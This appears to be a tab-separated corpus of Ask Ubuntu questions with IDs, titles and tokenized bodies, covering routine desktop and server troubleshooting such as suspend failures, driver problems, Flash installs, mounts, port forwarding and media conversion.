7805	no resume after hibernate or standby	when i try to reactivate my notebook after it went to standby or suspend mode the screen stays black . the only solution i have is to reboot the notebook by pressing the shutdown button . anyone has any idea to fix the problem ?
7809	how to back up a system ?	if i want to make a backup of my entire os ( including but not just my home directory ) , how do i go about this ? is it as simple as backing up everything in / and then when if i suffer a crash , just copying the files back over ? will this cover grub , and how do i actually do this when the system is inoperable ?
7816	why does ubuntu use pulseaudio ?	i 'm not here to criticize pulseaudio , but i find it immature and unnecessary . it eats system resources , causes confusions , and complicates the system by adding an extra layer without seemingly clear benefits , and i 'm not the only one who thinks this way . ( in fact , for more `` real '' complaints , refer to this link : http : //amplicate.com/hate/pulseaudio ) why does ubuntu come with pulseaudio as its sound server in the first place ? is there any good alternatives to this as of today ?
7825	do i need to re-purchase software in the ubuntu software centre if i reinstall ?	i want to purchase the fluendo dvd player using the ubuntu software centre . if i reinstalled ubuntu , would i have to purchase the software again ?
7834	why is my network manager so slow to start ?	ever since i installed 10.10 , the network applet stays with a red exclamation point for about 10 seconds . i do n't know why this is happening . please help me , this is very annoying ! i did n't have this problem when i was with 10.04 . edit : i should maybe mention the indicator appears , but it says that there are no network available . only after the aforementioned 10-15 seconds does it detect all the networks . edit 2 : this question is not answered ! i have tried with another computer , and the network manager is already loaded upon login , so i know it 's a bug . please help ! edit 3 : i have the same problem with my power indicator , actually ... edit 4 : the problem is back once again . i have counted : it takes a full 15 seconds to load after my desktop . edit 5 : i have filed a bug report in launchpad here . can anyone help me ? edit 6 : still nobody ?
7836	is it worth paying for crossover games or cedega ?	i have had crossover games ( also called cx games ) recommended to me as a time-saver for installing windows-native games on linux . i have also come across another package called cedega . these apps make it easier to run games by supplying the correct wine settings , and in the case of cedega , actually making changes to the compatibility layer ( i.e . it does not simply use wine as a back-end ) . cedega charges an ongoing subscription fee , which really rubs me up the wrong way , whereas cx games is a one-off payment which entitles you to any future upgrades ( please correct me if i 'm wrong on that point ) . if you have used these packages , did they save you time / headaches getting games running , could you run games which were impossible / very hard to run straight through wine ? edit : as pointed out by janc playonlinux is also available , a free front-end for wine which includes some profiles for games . i was unfairly mentally lumping this in with wine .
7839	about the architecture of virtual-machine	system information : ubuntu smp thu sep 16 16:05:42 utc 2010 x86_64 gnu/linux virtual marchine : virtualbox 3.1.6_ose r59338 linux.amd64 i wan na to install a virtual system with x86-64 in virtual box , but it seemed that it is impossible to do this . the virtual machine tips me it only detected an i686 cpu . is there any link between the architecture of host and that of the client virtual os ? kvm-okresult : info : your cpu supports kvm extensions info : /dev/kvm does not exist hint : sudo modprobe kvm_amd kvm acceleration can not be used sudo modprobe kvm_amdresult fatal : error inserting kvm_amd ( /lib/modules/2.6.32-24-server/kernel/arch/x86/kvm/kvm-amd.ko ) : operation not supported kvm-okagain : info : your cpu supports kvm extensions info : kvm is disabled by your bios hint : enter your bios setup and enable virtualization technology ( vt ) , and then hard poweroff/poweron your system kvm acceleration can not be used but another problem happened , the virtualbox displayed an error windows . : vt-x/amd-v hardware-acceleration has been enabled , but it is in the ineffective status . so the virtualbox wo n't detect the cpu of 64bit , and fail to start.please confirm the support has been enabled . how to check the cpu whether support the vt-x/amd-vtechnology ? and start it in bios ? but another virtual os ( 32bit ) also enable this technology , and works well .
7848	organize music folder automatically	is there any way i can automatically organize my music folder ? banshee ( at least i think it was banshee ) moved tons of stuff out of their band/album folders and into the root music folder and it will drive me crazy until i can fix this . i 'd prefer it to be something that works automatically according to parameters i specified ( based on music meta-data ) . also , it might need to skip symlinks although this is required .
7850	how can i remove `` set up mail '' and other entries from the message indicator ?	is there any other way of removing the `` set up mail '' and other entries from the message indicator short of uninstalling evolution ? i prefer to use gmail directly through the browser . it 's beginning to annoy me since i keep on clicking it by accident then that window pops out .
7856	ubuntu one eating my dropbox	i used to have a perfectly good working dropbox account on my ubuntu 10.04 lts computer . somewhere along the chain of `` sudo apt-get update ; sudo apt-get upgrade '' over the past year , my dropbox suddenly stopped working . instead , i see ubuntu one stuff on the menus in nautilus instead of dropbox . so , i did `` apt-get -- purge remove nautilus-dropbox '' , and then went to dropbox.com to download the deb file and reinstall it again . but no dice . i get the dropbox icon in my `` systray '' , and clicking it opens ~/dropbox folder , but it does not sync with dropbox and rightclicking nautilus does not show me menu items for dropbox . instead , i see items for ubuntu one sharing . i like ubuntu one really only for the music purchasing because i am guessing that it helps canonical.com pay ubuntu 's light bills . but i 'm not interested in anything else with ubuntu one besides that -- not interested in ubuntu one offsite file storage . i really just want my dropbox sync with nautilus to start working again . how do i fix this back so that dropbox syncs with nautilus again ?
7858	why is ksoftirqd/0 process using all of my cpu ?	i was feeling ubuntu was running a bit sluggish , and then i went to see the processes running on it , and found one which was using something like 50 % of cpu called ksoftirqd/0 . does anyone know what this process does , why it is using so much cpu and how to make it less cpu-intensive ?
7859	which music players use the soundmenu ?	i 'm not looking for recommendations on what music player i should use . i would simply like to know which music players use ubuntu 's new sound menu . the only two i know of for sure are banshee and rhythmbox . maybe amarok does too ? are there any outside of these ?
7862	no installer icon in desktop when customized ubuntu 10.10 using remastersys	i just customised ubuntu 10.10 using remastersys using 'dist ' option . but , when i booted the custom iso image to pendrive & booted using it , the live desktop is showing up . but , how can i install it ? there is no installer in the desktop . can anyone help ?
7863	is it ok to force install an 32-bit debian package on amd64 ?	i would like to install a 32-bit deb package on amd64 . it is not anything system critical , would it cause problems ? is there a better way to install ?
7865	how do i make windows 7 the default os instead of ubuntu ?	i was following this guide : http : //www.howtogeek.com/howto/ubuntu/set-windows-as-default-os-when-dual-booting-ubuntu/ in order to make windows the default os when i boot the computer but the problem is that the file which opens when i run the commend which manshened in the text is empty and dos n't have any of the lines it should have according to the guide so can anybody help and tell me how to see the text or give another way of making windows 7 the default os ?
7871	ubuntu crashed after installing nvidia driver on additional drivers	i have installed ubuntu 10.10 32bit on my pc with my usb flash disk . then , i installed nvidia driver with additional driver . unfortunately , i forgot the driver 's version , but i think it 's nvidia-185 . and i reboot my pc , and showed up a ugly splash screen , and i ca n't passed login screen . the screens showed up a mess , and i ca n't login anymore . could you help me ?
7874	server does not recognize second virtualbox adapter	i have installed ubuntu server 10.04 as a guest operating system under virtualbox 3.2.10 . my host system is ubuntu 9.04 i have configured two network adapters for the guess ( a nat one and a host-only one ) the nat one is recognized without problems by the guest , but in order to recognize the host-only adapter i have to run sudo dhclient , thus making it impossible to run the guest in headless mode . i 'm sure i am forgetting something . when i run ifconfig right after login i see two interfaces ( eth0 and lo ) , then after running sudo dhclient i see three interfaces ( eth0 , eth1 and lo ) so the question is : how can i make ubuntu to get the ip from the second adapter at boot time in order to be capable of running headless and accessing it via ssh ?
7875	how do i purchase ubuntu one songs without using ubuntu one file sharing ?	i want to use dropbox instead of ubuntu one . but i like the idea of buying mp3s for 88 cents from ubuntu one because it can help contribute cash to the ubuntu project . i have disabled and uninstalled ubuntu one client on my ubuntu 10.04 lts workstation . is there a way that i can still purchase and download mp3s from ubuntu one without installing the ubuntu one client ?
7881	what is the x server ?	i have been using ubuntu for quite some time but , i have no idea what the x server is ? i hear it quite often . i would like to know what the x server is and what it does . how ~/.xinitrc file is used and knowing what the x.org does in the realm of x server .
7882	can the nautilus properties page show size in bytes for multiple-selects , and for directories ?	in nautilus , the properties of a single item shows the size as : a value rounded to one decimal place ... nn.n kb , mb , gb ... followed by an exact byte count for non-single items , nautilus onlys show a rounded size . ( single item ) size : 1.4 gb ( 1501773824 bytes ) ( multi items ) size : 5 items , totalling 1.4 gb ( directory ) size : 5 items , totalling 1.4 gb is there some way to make nautilus display the exact byte count in all situations ? i like the way the properties dialog allows me to copy this size data , but i usually want to work with the exact size ( not an approximation ) . konqueror shows the real size total , but it does n't allow me to copy the value to to clipboard . nb : the soluton zerwas provided ( below ) works nicely , except it reaches an integer maximum of 4,294967,296 bytes ( 4 gb ) ... so for anyone reading this and interested to use this method , here is the ammended code , which caters for a `` long long '' integer ... 9,223,372,036,854,775,807 bytes ( 8 eb.. e xabytes ) . the first line ( /* new */ ) is at line-number 2337 /* new */ long long ll_total_size = total_size ; /* mod */ size_str = g_format_size_for_display ( ll_total_size ) ; /* mod */ text = g_strdup_printf ( ngettext ( `` % 'd item , with size % s ( % lld bytes '' , /* mod */ `` % 'd items , totalling % s ( % lld bytes ) '' , /* asis */ total_count ) , /* mod */ total_count , size_str , ll_total_size ) ; new displayed info : ( single item ) size : 1.4 gb ( 1501773824 bytes ) ( multi items ) size : 5 items , totalling 1.4 gb ( 1502027641 bytes ) ( directory ) size : 5 items , totalling 1.4 gb ( 1502027641 bytes ) -- ( directory ) size : 188,120 items , totalling 766.8 gb ( 823295045767 bytes )
7884	how to fix the panel indicator display errors ?	how do i fix this error ? i know this can be done by restarting the panel , but this is not convenient because every time you boot you need to do it .
7886	docky is not showing the correct icon	hopefully an easy one , i have just installed docky on my media center and it refuses to display the correct icon for nautilus when i have it open . instead i get an ugly grey box . anyone know how to fix this ?
7887	dual monitors in ubuntu 10.10	i have 2 monitors ( laptop + monitor ) . one of them 1280*800 , second - 1366*768 . now i have 3 problems : how can i do that all ubuntu panels be only on laptop ( first ) display ? on notebook resolution is 800 , on display 768 . of course i have `` blind '' zone , where i cant see cursor . nvidia settings show that resolution is 768 , but i already can move cursor to this zone . how can i fix this ? how can i install different wallpapers on each display ? my nvidia-setting screen : please help me and sorry for my english , i am from russia : )
7890	ca n't install adobe flash plugin in 10.10	i installed the adobe flash plugin from the software center . installation took a long and never finished . after a reboot the package is marked as installed but firefox still says its missing this plugin . i tried uninstalling it from the software center but it just says 'removing '' for ever . what can i do ? update $ sudo apt-get install flashplugin-installer e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i guess it 's because it 's still being `` removed '' ( although the software center window is closed ) . update 2 after a reboot : $ sudo apt-get install flashplugin-installer e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . update 3 $ sudo dpkg -- configure -a setting up flashplugin-installer ( 10.1.85.3ubuntu1 ) ... downloading ... -- 2010-10-17 11:18:31 -- http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_10.1.85.3.orig.tar.gz resolving archive.canonical.com ... 91.189.88.33 connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ... read error ( connection reset by peer ) in headers . retrying . -- 2010-10-17 11:21:41 -- ( try : 2 ) http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_10.1.85.3.orig.tar.gz connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ... read error ( connection reset by peer ) in headers . retrying . -- 2010-10-17 11:22:04 -- ( try : 3 ) http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_10.1.85.3.orig.tar.gz connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ... read error ( connection reset by peer ) in headers . retrying . -- 2010-10-17 11:22:52 -- ( try : 4 ) http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_10.1.85.3.orig.tar.gz connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ... and i guess it will keep on ... update 4 seems like this is related : https : //bugs.launchpad.net/ubuntu/+source/software-center/+bug/661979 ? comments=all update 5 i tried removing it first then install again using apt-get : $ sudo apt-get remove flashplugin-installer reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : flashplugin-installer 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 188kb disk space will be freed . do you want to continue [ y/n ] ? ( reading database ... 120250 files and directories currently installed . ) removing flashplugin-installer ... $ sudo apt-get install flashplugin-installer reading package lists ... done building dependency tree reading state information ... done suggested packages : xulrunner-1.9 firefox-3.0 konqueror-nsplugins msttcorefonts ttf-bitstream-vera ttf-dejavu ttf-xfree86-nonfree xfs the following new packages will be installed : flashplugin-installer 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0b/20.0kb of archives . after this operation , 188kb of additional disk space will be used . preconfiguring packages ... selecting previously deselected package flashplugin-installer . ( reading database ... 120229 files and directories currently installed . ) unpacking flashplugin-installer ( from ... /flashplugin-installer_10.1.85.3ubuntu1_i386.deb ) ... setting up flashplugin-installer ( 10.1.85.3ubuntu1 ) ... downloading ... -- 2010-10-17 11:26:48 -- http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_10.1.85.3.orig.tar.gz resolving archive.canonical.com ... 91.189.88.33 connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ... read error ( connection reset by peer ) in headers . retrying . -- 2010-10-17 11:27:34 -- ( try : 2 ) http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_10.1.85.3.orig.tar.gz connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ...
7891	changing the filesystem of the root partition after install	i have an existing install of ubuntu 10.10 , i have installed using ext4 as my filesystem . i want to change to btrfs . 1 ) is this sane ? if a reinstall is really the only sane way to do this , please let me know . 2 ) what is the safest way to do this ? i have enough space on the hdd to create another partition of equal size to the root partition and copy over the data , but will i have to make any changes in /etc or anywhere else ? thanks .
7892	copying default puredyne audio settings ?	i would like to use ubuntu as my main operating system but i get too many xruns when i run jack . i tried several solutions i found online but i could not solve the problem . i am very happy with the audio settings in puredyne . is there a way to compare audio settings in puredyne with the settings in ubuntu ? which configuration files should i look into ? any help is greatly appreciated .
7895	how can i change the default user shown in the login screen ?	well , the title is pretty much it . when i start my system i always get the same user on the login screen ( this is the original user created when the system was first installed ) . how can i change that so i wo n't have to type in the actual username i use everyday each time ?
7907	how to get ubuntu to recognize an old windows 95/98 partitioned hard drive ?	here is my issue : i have an old 1.6 gb hard drive that has been sitting in the basement for a while . it actually booted up with windows 95/98 and the when i explored the hard drive it looked like data was still there . i took out the hard drive and put it in an external hd enclosure and hooked it up to my laptop running 10.04 . if i do a : sudo fdisk -l the drive does n't show up . i checked in the disk utility and the drive is there but it says it has no partition . i 'm pretty sure that it does ( as i could see the data when it was still in the pc downstairs ) . any thoughts suggestions on how to get the drive to mount correctly ? all i really need is to get some files off of the drive . update : so i 'm trying out testdisk . it appears that there is a read error on just about every cylinder that it 's testing though .
7924	assign shift+tab to the control button on the right ?	is it possible to assign shift + tab to the control key on the right ?
7925	can i configure low disk space warning to a lesser threshold ?	ubuntu warns me about low disk space even when there are about 2 gibs free . for me `` low disk space '' is 50 mib or less as i use to use my disks at 100 % capacity . the warning could be useful for me if it was warning only when i am really running nearly out of space . can this be configured ?
7926	show contacts in indicator applet	how can i make the indicator applet show my online friends from empathy ? is it even possible with the current indicator ?
7928	hard drive overheating badly	my laptop 's hard drive heats up quite badly . the regular operating range hovers around 42-44 centigrade . it gets even worse when the screen is locked with temperatures shooting up to 50c . the casing next to the track pad gets ridiculously hot and at this point i am really worried that continuous high temperatures is a hard drive failure waiting to happen . i 've searched and fiddled with hdparm spin-down options with no success . the other related option seems to be installing this thing called laptop-mode-tools . i 'm not sure if this will do the trick since it seems to be about extending battery life whereas my problem occurs even with ac power on . what are the options i have ? will installing laptop mode tools do anything good in this case ? i am using a sata 7200 rpm drive . ubuntu version : lucid lynx .
7930	how can i install freenx server ?	i was following the instructions but got this : $ sudo add-apt-repository ppa : freenx-team executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv f3a662b57d580d3a2e98e5152a8e3034d018a4ce gpg : requesting key d018a4ce from hkp server keyserver.ubuntu.com ? : keyserver.ubuntu.com : connection timed out gpgkeys : http fetch error 7 : could n't connect : connection timed out gpg : no valid openpgp data found . gpg : total number processed : 0 update apparntley this was a proxy issue . see https : //bugs.launchpad.net/ubuntu/+source/software-properties/+bug/443404 . i solved it by : $ sudo http_proxy=http : //myproxy:8080 add-apt-repository ppa : freenx-team and continued following the instructions . now i have another problem : $ sudo /usr/lib/nx/nxsetup -- install -- -- -- > it is recommended that you use the nomachine key for easier setup . if you answer `` y '' , freenx creates a custom keypair and expects you to setup your clients manually . `` n '' is default and uses the nomachine key for installation . do you want to use your own custom keypair ? [ y/n ] /usr/lib/nx/nxsetup : line 140 : . : filename argument required . : usage : . filename [ arguments ] setting up ... mkdir : missing operand try `mkdir -- help ' for more information .
7931	shred alternatives ext3 ?	given the fact shred will not be effective on ext3 , i wonder what are the available alternatives right now . $ man shred ... caution : note that shred relies on a very important assumption : that the file system overwrites data in place . this is the traditional way to do things , but many modern file system designs do not satisfy this assumption . the following are examples of file systems on which shred is not effective , or is not guaranteed to be effective in all file sysâ tem modes : * log-structured or journaled file systems , such as those supplied with aix and solaris ( and jfs , reiserfs , xfs , ext3 , etc . ) ...
7933	how to repair a failed install ?	i had to do a hard reboot on my computer while installing mysql-admin and now i get an error when trying to install it . here is the error message : how can i `` repair this '' ?
7936	can mount using mount but not using /etc/fstab	i can mount my remote server home using : mount servername : /home /mnt/home but this only lasts until reboot . i added the following the the end of /etc/fstab : servername : /home /mnt/home but i get an error while restarting saying mount failed . i opened the ( recovery ? ) console as suggested by the error message , there i could see the server is not recognized . i also tried pinging its ip but it was unreachable . perhaps this is because we 're using a proxy ? so , what can i do to mount this location permanently ?
7937	login sound still plays despite disabling from administration login screen	in maverick , i get the login sound when my computer starts up and i auto-login . the happens despite the fact that i 've turned off the `` play login sound '' on the administration > login screen dialog . how can i turn off the login sound playing ?
7944	how can i add screensavers ?	i guess some of the screensavers in ubuntu are nice . but i 'd really like more . so i would like to know if anyone knows a website with screensavers for ubuntu ? also , i am particularly looking for a screensaver that does a bit like mac 's ribbon ribbons of light thing .
7949	where does the system information information come from on login ?	i have a local server running ubuntu 10.04 headlessly . when i ssh to the server i get some core information about the system , such as system load : 0.0 processes : xxx usage of / : 2.5 % of 452.69gb users logged in : 0 memory usage : 10 % ip address for lo : xxx.xxx.xxx.xxx swap usage : 0 % ip address for eth0 : xxx.xxx.xxx.xxx temperature : 40 c what is the command to get this information to print again ? i tried looking in the rc.local and the bash.bashrc file to see how this was run , but i could not find anything .
7950	how to open ports for outside traffic ?	i recently installed ubuntu server on an old machine , to set up a website with family photos etc . it is connected to the internet via my home router ( wrt160nv2 ) . i set the connection up with a static ip address ( 192.168.1.200 ) , set forwarding rules on the router ( for port 80 ) . apache2 is set up to listen on port 80 ( and it does ) . i can view the website from within the local network ( just typing in 192.168.1.200 in the browser on any computer behind the router ) , but it 's invisible from the outside . ports are forwarded correctly , when i forwarded them to another machine within the network , it 's visible from the outside . it has to be some problem with this server , it blocks all connections from external addresses . why ? this is not just a problem with port 80 , all ports seem closed from the outside . the built-in firewall ( ufw ) is active , but set to allow all connections ( i tried disabling it , no change ) . no help from netstat either . root @ czarny : ~ # netstat -an | grep `` listen `` tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen tcp 0 0 0.0.0.0:993 0.0.0.0 : * listen tcp 0 0 0.0.0.0:995 0.0.0.0 : * listen tcp6 0 0 : ::8080 : : : * listen tcp6 0 0 : ::22 : : : * listen tcp6 0 0 127.0.0.1:8005 : : : * listen root @ czarny : ~ # ufw status status : active to action from -- -- -- -- -- -- apache allow anywhere postfix allow anywhere dovecot pop3 allow anywhere dovecot imap allow anywhere dovecot secure imap allow anywhere dovecot secure pop3 allow anywhere postfix submission allow anywhere openssh allow anywhere apache full allow anywhere
7955	unity launcher in desktop edition ?	is it possible just to get the unity launcher - just be the unity launcher - in desktop edition ? as an alternative to avant , docky or gnome do ? update : i would just to point out that we now know the 11.04 desktop edition with have the unity interface by default !
7960	how to disable indicator applet application menu for eclipse	i recently installed the indicator applet application menu but unfortunately it does not work with eclipse . so i was wondering if it is possible to disable by using a command line parameter for example .
7968	libunrar.so not found	i 'm having trouble installing libunrar.so . it 's required for calibre to convert cbr files . anyone an idea on where to get it ( package or source ) ?
7975	disk is full after runing gparted ?	i have around a 150gb hard drive that i had fully allocated to ubuntu 10.10 . i fired up the gparted live cd and reduced it by 47gb for a small ntfs partition for windows . when it was completed , i rebooted and ubuntu seemed to load up fine , however , i get the following error at the gdm login screen : the configuration defaults for gnome power manager have not been installed correctly . please contact your computer administrator . i also have noticed that it says i am using 103gb of 103gb on my ubuntu partition . before the resize , i was using about 40gb of space . why does it suddenly think i 'm using 103gb ?
7976	how do you test the network speed betwen two boxes ?	i have gigabit network setup in my house and few ubuntu based boxes . out of complete curiosity i would like to check the speed between the two boxes . i am not having any problems with speed or anything , it really is just the geek in me that is curious . plus maybe the results will let me know if there is room for improvement , or that i have something configured wrong . so how do you properly test the network speed between ubuntu boexs ?
7979	how can i reset all rhythmbox preferences and library information ?	background : i can not figure out how to make rhythmbox scan only the folder with my music in it . i want to delete all of its settings and start over . what do i have to do to make rhythmbox think it 's never been run before ?
7980	screensaver + lock double login problem after maverick upgrade	just found something strange after updating from 10.04 to 10.10 . i 've set up my screensaver to lock the account when activated . when i log back in , i see my desktop for a second and then the screensaver starts again and i have to re-login . i checked my process list in gnome system monitor , and i have two gnome-screensaver processes ( ! ? ) , one started as /usr/bin/gnome-screensaver and other simply as gnome-screensaver . and no , i did not start one manually . where do i look for a way to switch off one of those ( supposing that 's the problem ) ? i did not find anything in my startup applications .
7990	what can i do about missing libgdk_pixbuf-2.0.la ?	i 'm trying to compile an application ( peekabot ) from source on a clean install of 10.10 ( this is under virtualbox on os x , but i do n't think that this is a problem ) . when it performs a linking step it fails because of a missing static library : libtool : link : can not find the library `/usr/lib/libgdk_pixbuf-2.0.la ' or unhandled argument `/usr/lib/libgdk_pixbuf-2.0.la' i have libgdk-pixbuf2.0-dev installed , hence the worry . the reference to the library appears to have been added as a dependency of libgtkglextmm and libgdkglextmm : grep `` libgdk_pixbuf-2.0.la '' /usr/lib/*.la /usr/lib/libgdkglextmm-x11-1.2.la : dependency_libs= ' /usr/lib/libgdkglext-x11-1.0.la /usr/lib/libgdk-x11-2.0.la /usr/lib/libgdk_pixbuf-2.0.la /usr/lib/libpangocairo-1.0.la /usr/lib/libgio-2.0.la /usr/lib/libpangox-1.0.la /usr/lib/libpango-1.0.la /usr/lib/libgobject-2.0.la /usr/lib/libgmodule-2.0.la /usr/lib/libglib-2.0.la -lglu -lxmu -lxt -lsm -lice /usr/lib/libgdkmm-2.4.la /usr/lib/libpangomm-1.4.la /usr/lib/libglibmm-2.4.la /usr/lib/libcairomm-1.0.la /usr/lib/libcairo.la -lfreetype -lz -lfontconfig -lpng12 -lxcb-render-util -lxrender -lx11 -lpixman-1 /usr/lib/libsigc-2.0.la' /usr/lib/libgtkglextmm-x11-1.2.la : dependency_libs= ' /usr/lib/libgdkglextmm-x11-1.2.la /usr/lib/libgtkglext-x11-1.0.la /usr/lib/libgdkglext-x11-1.0.la /usr/lib/libgtk-x11-2.0.la /usr/lib/libatk-1.0.la /usr/lib/libpangoft2-1.0.la /usr/lib/libfreetype.la /usr/lib/libgdk-x11-2.0.la /usr/lib/libgdk_pixbuf-2.0.la /usr/lib/libpangocairo-1.0.la /usr/lib/libgio-2.0.la /usr/lib/libpangox-1.0.la /usr/lib/libpango-1.0.la /usr/lib/libgobject-2.0.la /usr/lib/libgmodule-2.0.la /usr/lib/libglib-2.0.la -lglu -lxmu -lxt -lsm -lice /usr/lib/libgtkmm-2.4.la /usr/lib/libgiomm-2.4.la /usr/lib/libgdkmm-2.4.la /usr/lib/libatkmm-1.6.la /usr/lib/libpangomm-1.4.la /usr/lib/libcairomm-1.0.la /usr/lib/libcairo.la -lfreetype -lpng12 -lxcb-render-util -lxrender -lx11 -lpixman-1 /usr/lib/libglibmm-2.4.la /usr/lib/libsigc-2.0.la -lz -lfontconfig' but the referenced static library is missing from my system . so , is there a way to get this library that i 'm missing , or is there some other workaround i can use ? thanks , nick
7993	how can i setup a mail transfer agent ?	i intend to use mutt to send automated emails via cron or at with attachments to my gmail address when particular events happen on my ubuntu server . currently , mutt can not send email to external email addresses , i believe this is because i need to setup a mail transfer agent . how do i go about selecting a suitable mta and how do i set it up to perform what i need it to do ?
7994	how can i create a new user with the equivalent of a windows guest-user 's permissions ?	basically , i want the new user to have only a few permissions -- ca n't read the normal users ' home directories , can only read or write files to one directory ( can only read or write /home/user/ ... can not read or write /home/me/ or read or write /home/someoneelse/ . that 's a common setup for schools and universities which run windows networks . it seems like it should be simple in ubuntu .
7995	how can i disable the prompt to run programs for my digital audio player 's memory card ?	when i plug in my digital audio player two prompts to run programs appear simultaneously : how can i disable the prompt for the player 's memory card so that only one prompt is displayed ?
7996	problems with blender3d and ati graphics	i recently upgraded to 10.04 , then to an ati graphics card ( i used the internal graphics port before ) and now noticed that blender is behaving very strange . menus do n't work or very slowly , fragments on the screen and so on . i did n't try anything else because it 's impossible to use . the card is an ati radeon hd 4650 . did anyone experience similar problems ?
7999	there is no network manager in the panel for the second user	i have ubuntu 10.10 and i have two users registered on it . once user1 enters to the system and does n't close his session and user2 enters to the system , user2 ca n't see network manager in his panel . so , he can not see list of available wifi , etc . how can i solve this bug ?
8000	mouseimp alternative on linux ( drag and scroll ) ?	is there a tool that enables you to scroll by dragging the mouse with the right button pressed . i was using an app called `` mouseimp '' on windows many years ago . the tool was quite handy , since you were able to scroll much faster than with the mouse-wheel e.g . on large pages . moreover you were able to scroll horizontally as well . this all was possible by just keeping the right mouse-button pressed anywhere on a window and dragging the pointer up , down etc . the software became open-source a few years ago but afaik there has not been a linux port . best , ysn
8001	how can i increase my disk space when ubuntu is installed inside windows ?	i have ubuntu 10.10 installed inside of windows using wubi . i am running out of space on my ubuntu disk ( currently 405.1 mb free ) . i have a 180 gb hard drive and when i installed ubuntu i only allocated 10 gb to it . how can i resize my disk to give ubuntu some more space ?
8002	how to remove everything ubuntu one-related ?	is sudo aptitude purge ubuntuone ? sufficient to remove everything ubuntu one-related from my system ?
8006	accesing ftp files through terminal ?	after connecting to a local ftp server , how can i acces the files through the terminal ? thanks in advance .
8008	how to make the toolbar go back to default ?	at the moment , the main tool-bar is on the middle of the screen and there is no space on the tool-bar click-able to get it back to the stretched position thank you
8015	what irc clients are available ?	what programs can be used for irc ( =internet relay chat ) ?
8016	mysql data modeling on netbook	looking for a mysql data modeling toll , that will actually fit on my netbook screen . the official workbench needs a higher resolution , so the bottom bit is cut off . really annoying . is there an alternative out there ? or some 'trick ' to make the workbench fit on my screen ?
8019	how can i enable ati open source drivers ?	i have a ati radeon 3600 and i am kind of new to ubuntu and linux . i have read that proprietary ati drivers are n't good enough and that open source drivers do work very well .
8021	converting a video file in arbitrary file format into mpeg4/h.264 ?	i want to convert a large number of video files in various formats into .mp4 files ( container mpeg-4 , codec h.264 ) . i want to do this on an ubuntu machine , using only command-line tools and i 'm willing to install packages from main , restricted , universe and multiverse . ideally i 'd like to be able to do ... for video_file in * ; do some_conversion_program $ video_file $ video_file.mp4 done ... and have all my video files in .mp4 format with container mpeg-4 and codec h.264 . how would you tackle this problem on an ubuntu machine ? what packages do i need to install ?
8031	unable to change encoding to utf8	hey ! i am having this really strange problem . i ca n't convert a file to utf8 it 's always in us-ascii . i have tried this : iconv -- verbose -- output=test2 -t utf-8 test ( i have also specified the -f with iso-8859-1 and us-ascii ) and when i do file -- mime-encoding test2 i get us-ascii the file contains some html and php . i really do n't understand this . i have tried using notepad++ ( i am sharing this folder to a win7 pc ) . i set the encoding to utf8 without bom , the file seems to change ( the icon turns red ) but when i save and check it continues to do be us-ascii . i have checked the $ lang and it outputs en_us.utf-8 ( should i change something in the locales ? i would prefer this not to anything country specific ) i have also tried recode which also did n't work . note : some files are being created in utf8 ( i am using eclipse and have set the project properties to encode in utf8 ) but for some strange reason some are not being correctly encoded . again their contents are html and php . please someone help me out . i am trying to show my site in utf8 and some parts are getting messed up because of this ! thanks !
8039	any good sites explaining how to use pitivi ?	i have played around with it a bit ... but still could use some help .
8040	annoying vdpau error in mplayer	every time i play a video with mplayer , i 'm getting an annoying popup dialog saying : failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory how to solve this ? my laptop is a compaq cq20-213tu .
8043	what is encrypted home directory ?	when i do a fresh install i am given an option to check the option to encrypt my home directory . what is home directory encryption ? and how much my performance degrades if i do so ? how to do it on a running pc but not through the option given at the installation .
8053	what is the deal with the copyrights issue of ubuntu and canonical	i just came across this post via hacker news and wonder what is all the fuss about ? ubuntu will always be free , right ? that is a promise no one is intending to break . more than that , the ubuntu itself , will remain licensed under same licenses it is today , right ? i would appreciate if one can tell how this shall affect our use of the great ubuntu whatsoever .
8055	graphical tool for creating deb packages	are there any graphical tools for creating ubuntu/debian packages ?
8056	how to prevent resume from sleep/suspend on lid open ?	i 've got pretty much the same problem as this old 2006 thread on the ubuntu forums : my old laptop 's lid is a bit shaky , which causes the computer to wakeup/suspend if i just touch it the wrong way ( e.g . lifting it up to move it ) . back then , the fix ( see link ) was to have a startup script disable lid in /proc/acpi/wakeup every time the computer boots . i 'm wondering if there 's a better , less hacky , solution ?
